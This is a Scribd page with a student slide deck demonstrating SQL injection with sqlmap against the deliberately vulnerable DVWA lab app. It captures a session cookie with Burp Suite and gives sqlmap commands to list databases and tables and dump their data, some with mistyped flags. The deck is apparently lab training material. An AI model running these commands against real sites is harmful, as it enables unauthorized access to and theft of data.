0% found this document useful (0 votes)
206 views9 pages

SQL Injection Attack Using SQLMap Guide

This document demonstrates how to perform an SQL injection attack using the SQLmap tool. It shows the steps to identify vulnerable parameters in a URL, capture cookies for the site, and then use SQLmap commands to list databases, tables, and extract data from the tables by exploiting SQL injection vulnerabilities. The demonstration targets a vulnerable web application called DVWA running on a test server.

Uploaded by

Ronak Makwana
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
206 views9 pages

SQL Injection Attack Using SQLMap Guide

This document demonstrates how to perform an SQL injection attack using the SQLmap tool. It shows the steps to identify vulnerable parameters in a URL, capture cookies for the site, and then use SQLmap commands to list databases, tables, and extract data from the tables by exploiting SQL injection vulnerabilities. The demonstration targets a vulnerable web application called DVWA running on a test server.

Uploaded by

Ronak Makwana
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
  • Introduction
  • Project Description
  • SQL Injection on DVWA using SQLMap

SQL Injection Attack

Demonstration

Presentation by:
(1)Ronak Makwana
(2)Yash Keral
Project Description

 The Project involves performing SQL injection on vulnerable systems using the SQLmap tool.
 SQL injection Attacks are designed to exploit Vulnerabilities in web applications that allow an attacker to
inject malicious SQL code into a query, potentially allowing unauthorized access to data.
 The project may involve using different techniques such as blind SQL Injection, error-based SQL injection
and other methods to exploit vulnerabilities.
SQL Injection on DVWA using SQLMap

 Step 1: to be able to run SQLMap tool, first we


must identify the parameter and the URL that we
want to test SQLi Injection for.
SQL Injection on DVWA using SQLMap (Cont.)

 Step 2: When we enter a keyword in the User ID


field you can notice the will be change because of
get request method.
 We will pass this URL as parameter for SQLMap.
SQL Injection on DVWA using SQLMap (Cont.)

 Step 3: Capture the cookie using Burpsuite which


will be also used as parameter for SQLMap
 Now, we are ready to execute attack
SQL Injection on DVWA using SQLMap (Cont.)

 We can list the databases through SQL injection


with following command : $sqlmap -u
"http://192.168.1.19/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie='security=low;
PHPSESSID=4bcf28d8cd3f4ad8a6560c0fd0567c
91' --dbs
SQL Injection on DVWA using SQLMap (Cont.)

 Now, for the listing down table we can use


following command: sqlmap -u
"http://192.168.1.19/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie='security=low;
PHPSESSID=4bcf28d8cd3f4ad8a6560c0fd0567c
91' -D dvwa -tables
SQL Injection on DVWA using SQLMap (Cont.)

 At the end, we can use following command for


extracting data from tables: sqlmap -u
"http://192.168.1.19/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie='security=low;
PHPSESSID=4bcf28d8cd3f4ad8a6560c0fd0567c
91' -dump dvwa
 So, this is how we can perfrom SQL Injection
Attack using SQLMap.
Thank You!

SQL Injection Attack 
Demonstration
Presentation by:
(1)Ronak Makwana 
(2)Yash Keral
Project Description
The Project involves performing SQL injection on vulnerable systems using the SQLmap tool.
SQL injectio
SQL Injection on DVWA using SQLMap
Step 1: to be able to run SQLMap tool, first we 
must identify the parameter and the URL
SQL Injection on DVWA using SQLMap (Cont.)
Step 2: When we enter a keyword in the User ID 
field you can notice the will be
SQL Injection on DVWA using SQLMap (Cont.)
Step 3: Capture the cookie using Burpsuite which 
will be also used as parameter
SQL Injection on DVWA using SQLMap (Cont.)
We can list the databases through SQL injection 
with following command : $sqlmap
SQL Injection on DVWA using SQLMap (Cont.)
Now, for the listing down table we can use 
following command: sqlmap -u 
"http:/
SQL Injection on DVWA using SQLMap (Cont.)
At the end, we can use following command for 
extracting data from tables: sqlmap
Thank You!

You might also like